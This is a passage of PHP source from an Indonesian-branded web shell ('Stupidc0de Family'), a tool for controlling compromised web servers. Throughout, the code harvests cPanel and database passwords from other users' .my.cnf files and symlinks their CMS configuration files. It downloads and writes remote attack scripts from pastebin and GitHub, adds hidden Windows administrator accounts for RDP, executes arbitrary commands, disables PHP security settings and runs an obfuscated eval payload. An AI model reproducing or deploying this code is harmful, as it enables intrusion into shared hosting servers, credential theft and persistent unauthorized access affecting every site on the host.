  491.             <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
  492.                     <br>
  493.             <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^  &hearts;<br><br>
  494.             -:- No Leader We Just Laugh Together -:-</font><br><br>
  495.             <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
  496.             </center>
  497.                     </b>"; break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel')) { echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
  498.                        
  499.                     <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
  500.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
  501.                     <br/><br/><br/><br/>
  502.                 <?php break; ?>
  503.  
  504.                 <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack')) { ?>
  505.                             <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
  506.                 <?php  @ini_set('display_errors',0); function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){ $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); return trim($ar1[0]); } echo '<h1>Cpanel Finder/Cracker</h1><br/>'; echo "<center>"; $d0mains = @file('/etc/named.conf'); $domains = scandir("/var/named"); if ($domains or $d0mains) { $domains = scandir("/var/named"); if($domains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $dirz = '/home/'.$owner['name'].'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$owner['name'].'.txt'); $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; } } } echo '</table>'; $total = $dc; echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; }else{ $d0mains = @file('/etc/named.conf'); if($d0mains) { echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>"; $count=1; $dc = 0; $mck = array(); foreach($d0mains as $d0main){ if(@eregi('zone',$d0main)){ preg_match_all('#zone "(.*)"#',$d0main,$domain); flush(); if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0]; } } } $mck = array_unique($mck); $usr = array(); $dmn = array(); foreach($mck as $o) { $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o)); $usr[] = $infos['name']; $dmn[] = $o; } array_multisort($usr,$dmn); $dt = file('/etc/passwd'); $passwd = array(); foreach($dt as $d) { $r = explode(':',$d); if(strpos($r[5],'home')) { $passwd[$r[0]] = $r[5]; } } $l=0; $j=1; foreach($usr as $r) { $dirz = '/home/'.$r.'/.my.cnf'; $path = getcwd(); if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt'); $p=file_get_contents(''.$path.'/'.$r.'.txt'); $password=entre2v2($p,'password="','"'); echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>"; $dc++; flush(); $l=$l?0:1; $j++; } } } echo '</table>'; $total = $dc; echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />'; echo '</center>'; } }else{ echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>"; } echo "</body></html>"; break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'vn')) { ?>
  507.                     <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
  508.                     <center><h2>Domain Viewer</h2></center><br><br>
  509.                     <?php  function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '<font color="green">OFF</font>'; } else { $openBaseDir = '<font color="red">ON</font>'; } return $openBaseDir; } echo '
  510.                     <table width="95%" cellspacing="0" cellpadding="0"  >
  511.                     <td height="100" align="left" >'; $pg = basename(__FILE__); $safe_mode = @ini_get('safe_mode'); $dir = @getcwd(); @mkdir('pee',0777); @symlink("/","pee/root"); $htaccss = "Options all
  512.                  DirectoryIndex Sux.html
  513.                  AddType text/plain .php
  514.                  AddHandler server-parsed .php
  515.                   AddType text/plain .html
  516.                  AddHandler txt .html
  517.                  Require None
  518.                  Satisfy Any"; file_put_contents("pee/.htaccess",$htaccss); $etc = file_get_contents("/etc/passwd"); $etcz = explode("
  519. ",$etc); foreach($etcz as $etz){ $etcc = explode(":",$etz); error_reporting(0); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt'); } if(is_readable("/var/named")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td>
  520.                     <center><b>USER</b></center></td>
  521.                     <td></center><b>SYMLINK</b></center></td>'; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")){ $i += 1; $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  522.                     <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
  523.                     <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } } echo "<center>Total Domains Found: ".$i."</center><br />"; }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; } break; error_reporting(0); $etc = file_get_contents("/etc/passwd"); $etcz = explode("
  524. ",$etc); if(is_readable("/etc/passwd")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>'; $list = scandir("/var/named"); foreach($etcz as $etz){ $etcc = explode(":",$etz); foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); if($owner['name'] == $etcc[0]) { $i += 1; echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
  525.                 <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  526.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; }}}} echo "<center>Total Domains Found: ".$i."</center><br />";} break; if(is_readable("/etc/named.conf")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>'; $named = file_get_contents("/etc/named.conf"); preg_match_all('%zone \"(.*)\" {%',$named,$domains); foreach($domains[1] as $domain){ $domain = trim($domain); $i += 1; $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } echo "<center>Total Domains Found: ".$i."</center><br />"; } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; } break; if(is_readable("/etc/valiases")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >'; echo'<tr><td><center><b>SITE</b></center></td><td>
  527.                 <center><b>USER</b></center></td><td></center>
  528.                 <b>SYMLINK</b></center></td>'; $list = scandir("/etc/valiases"); foreach($list as $domain){ $i += 1; $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  529.                 <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  530.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>"; } echo "<center>Total Domains Found: ".$i."</center><br />"; } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; } break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) { ?>
  531.                 <br/><br/>
  532.                 <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
  533.                 <?php  $pilih = $_POST['pilihan']; echo'<center>
  534.                 <table border=1>
  535.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
  536.                 <option value="dumper">Gate 1</option>
  537.                 </select>
  538.                 <input  type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php  if ( $pilih == "dumper") { $files = file_get_contents("http://pastebin.com/raw/HhiURUER"); file_put_contents("dumper.php",$files); echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>"; echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>"; die(); } echo'</td></form></tr></table>'; break; } if(isset($_GET['x']) && ($_GET['x'] == 'krdp')) { if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { ?><br/><br/>
  539.                         <div id="content-left">
  540.                                 <form action="" method="post">
  541.                                 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  542.                                     <tr>
  543.                                         <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
  544.                                     </tr>
  545.                                     <tr>
  546.                                         <td><font class='kecew'>Username</font></td>
  547.                                         <td><font class='kecew'> : </font></td>
  548.                                         <td><input type="text" class="bordergaya" name="username" required></td>
  549.                                     </tr>
  550.                                     <tr>
  551.                                         <td><font class='kecew'>Password</font></td>
  552.                                         <td><font class='kecew'> : </font></td>
  553.                                         <td><input type="text" class="bordergaya" name="password" required></td>
  554.                                     </tr>
  555.                                     <tr>
  556.                                         <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
  557.                                     </tr>
  558.                                 </table>
  559.                                 </form>
  560.                                 </div>
  561.                                 <br/>
  562.                                 <div id="content-left">
  563.                                 <form action="" method="post">
  564.                                     <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  565.                                         <tr>
  566.                                             <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
  567.                                         </tr>
  568.                                         <tr>
  569.                                             <td><font class='kecew'>Username</font></td>
  570.                                             <td><font class='kecew'> : </font></td>
  571.                                             <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
  572.                                         </tr>
  573.                                         <tr>
  574.                                             <td><font class='kecew'>Password</font></td>
  575.                                             <td><font class='kecew'> : </font></td>
  576.                                             <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
  577.                                         </tr>
  578.                                         <tr>
  579.                                             <td><font class='kecew'>Action</font></td>
  580.                                             <td><font class='kecew'> : </font></td>
  581.                                             <td>
  582.                                                 <select name="aksi" class="bordergaya">
  583.                                                         <option value="1">Tampilkan Username</option>
  584.                                                         <option value="2">Hapus Username</option>
  585.                                                         <option value="3">Ubah Password</option>
  586.                                                 </select>
  587.                                             </td>
  588.                                         </tr>
  589.                                         <tr>
  590.                                             <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
  591.                                         </tr>
  592.                                     </table>
  593.                                 </form>
  594.                                 <br/>
  595.                         </div>
  596.                         </center></center>
  597.                     <?php  if($_POST['submit']) { if($_POST['kshell']=="1") { $r_user = $_POST['username']; $r_pass = $_POST['password']; $cmd_cek_user = shell_exec("net user"); if(preg_match("/$r_user/", $cmd_cek_user)){ echo $gaya_root.$r_user." sudah ada".$o; }else { $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add"); $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add"); $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add"); $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add"); if($cmd_add_user){ echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o; }else { echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o; } echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar..  <br/>"; if($cmd_add_groups1){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else if($cmd_add_groups2){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else if($cmd_add_groups3){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o; }else { echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o; } echo "<font class='rapihbanget'>[+] Server Info : </font><br/>"; echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username  : ".$r_user."</font><br/><font class='rapihbanget'>--- Password  : </font>".$r_pass.$o."</font><br/><br/>"; echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>"; } } else if($_POST['kshell']=="2") { echo "<style>
  598.                                     .coeg{margin-left:30%;}
  599.                                     </style>"; if($_POST['aksi']=="1"){ echo "<pre class='coeg'>".shell_exec("net user"); } else if($_POST['aksi']=="2") { $username = $_POST['rusername']; $cmd_cek_user = shell_exec("net user"); if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username." /DELETE"); if($cmd_add_user){ echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu..  </font><br /><br />"; echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User  </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o; }else { echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User  </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o; } } else if($_POST['aksi']=="3") { echo "<style>
  600.                                         .tengahaja{margin-left:35%}
  601.                                       </style>"; $username = $_POST['rusername']; $password = $_POST['gantipw']; $cmd_cek_user = shell_exec("net user"); if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username.""); if($cmd_add_user){ echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o; }else { echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o; } }else { echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o; } } } } } else{ echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>"; }break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot')) { echo'<center><br><br><h3>File Creator [Auto upload]</h3>
  602.                 <table>
  603.                 <tr><form method="post" action="">&nbsp;<td>
  604.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
  605.                 <option value="hsphere">Bypass hSphere Shell</option>
  606.                 <option value="adminer">Adminer</option>
  607.                 </select>
  608.                 <input  type="submit" name="submites" class="bordergaya" value="create">
  609.                 </td></form></tr></table>'; error_reporting(0); set_time_limit(0); $submit = $_POST ['submites']; if(isset($submit)) { $pilih = $_POST['pilihan']; if ( $pilih == 'hsphere') { $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php"); file_put_contents("hsphere.php",$files); echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>"; echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>"; die(); } elseif ( $pilih == 'adminer') { getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php"); echo "<script>alert('adminer created!'); hideAll();</script>"; echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>"; die(); } }break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'korong')) { echo '<center><br /><br />
  610.                         <form enctype="multipart/form-data" method="POST">
  611.                             <input type="file" name="file" id="file" class="inputfile inputfile-4" />
  612.                             <label for="file">
  613.                                 <figure>
  614.                                     <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
  615.                                 </figure>
  616.                                 <span>Silahkan Pilih File</span>
  617.                             </label>'; ?>
  618.                             <script type="text/javascript">
  619.                                     /*
  620.                                         By Osvaldas Valutis, www.osvaldas.info
  621.                                         Available for use under the MIT License
  622.                                     */
  623.  
  624.                                     'use strict';
  625.  
  626.                                     ;( function ( document, window, index )
  627.                                     {
  628.                                         var inputs = document.querySelectorAll( '.inputfile' );
  629.                                         Array.prototype.forEach.call( inputs, function( input )
  630.                                         {
  631.                                             var label    = input.nextElementSibling,
  632.                                                 labelVal = label.innerHTML;
  633.  
  634.                                             input.addEventListener( 'change', function( e )
  635.                                             {
  636.                                                 var fileName = '';
  637.                                                 if( this.files && this.files.length > 1 )
  638.                                                     fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
  639.                                                 else
  640.                                                     fileName = e.target.value.split( '\\' ).pop();
  641.  
  642.                                                 if( fileName )
  643.                                                     label.querySelector( 'span' ).innerHTML = fileName;
  644.                                                 else
  645.                                                     label.innerHTML = labelVal;
  646.                                             });
  647.  
  648.                                             // Firefox bug fix
  649.                                             input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
  650.                                             input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
  651.                                         });
  652.                                     }( document, window, 0 ));
  653.                             </script>
  654.                             <?php  echo'<br/>
  655.                             <input type="submit" class="tombolupil" value="Upload File!" />
  656.                         </form>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<script>alert("File Sukses Di Upload!");</script>'; }else{ echo '<script>alert("File Gagal Di Upload!");</script>'; } } echo "</center><br /><br />"; break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) { echo "<br/><br/><form method='post'>
  657.                 <font clss='rapihbanget'>Command :</font>
  658.                 <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
  659.                 </form>"; if($_POST['execmd']) { echo "<pre>".exe($_POST['cmd'])."</pre>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls')) { echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
  660.                     <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
  661.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
  662.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
  663.                     <br/><br/><br/><br/>
  664.                     <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) { echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>'; mkdir('bysyswsf', 0755); chdir('bysyswsf'); $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm"); $file = fopen("bysyswsf.php" ,"w+"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod("bysyswsf.php",0755); echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) { $byht = "safe_mode = Off
  665.                     disable_functions = None
  666.                     safe_mode_gid = OFF
  667.                     open_basedir = OFF
  668.                     allow_url_fopen = On"; file_put_contents("php.ini",$byht); echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>"; die('<meta http-equiv="refresh" content="0; url=?" />'); } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) { echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>'; mkdir('bysyswexecf', 0755); chdir('bysyswexecf'); $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd"); $file = fopen("bysyswexecf.php" ,"w+"); $write = fwrite ($file ,$bysyswsf); fclose($file); chmod("bysyswexecf.php",0755); echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ ?>
  669.                 <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
  670.                 <?php  ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 35) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '<br><br></center></center>'; echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd
  671. "."<br /></font>"; echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories
  672. "."<br /></font>"; echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>"; foreach ($users as $user) { $path = "/home/$user/public_html/"; echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>"; } echo "<br /><font class='rapihbanget'>[+] Complete...
  673. "."<br /></font>"; echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!
  674. "."<br /></font>"; echo '<br><br></b></body><center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; } else{ echo '</table><br />'; echo "<center>"; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<script>alert("Delete Dir Sukses!");</script>'; }else{ echo '<script>alert("Delete Dir Gagal!");</script>'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<script>alert("Delete File Sukses!");</script>'; }else{ echo '<script>alert("Delete File Gagal!");</script>'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  675.             '; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr>
  676.             <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
  677.             <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
  678.             <td><center>"; if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>"; elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>"; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td>
  679.             <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
  680.             <select class='bordergaya' name=\"opt\">
  681.             <option value=\"\"></option>
  682.             <option value=\"delete\">Delete</option>
  683.             <option value=\"chmod\">Chmod</option>
  684.             <option value=\"rename\">Rename</option>
  685.             </select>
  686.             <input type=\"hidden\" name=\"type\" value=\"dir\">
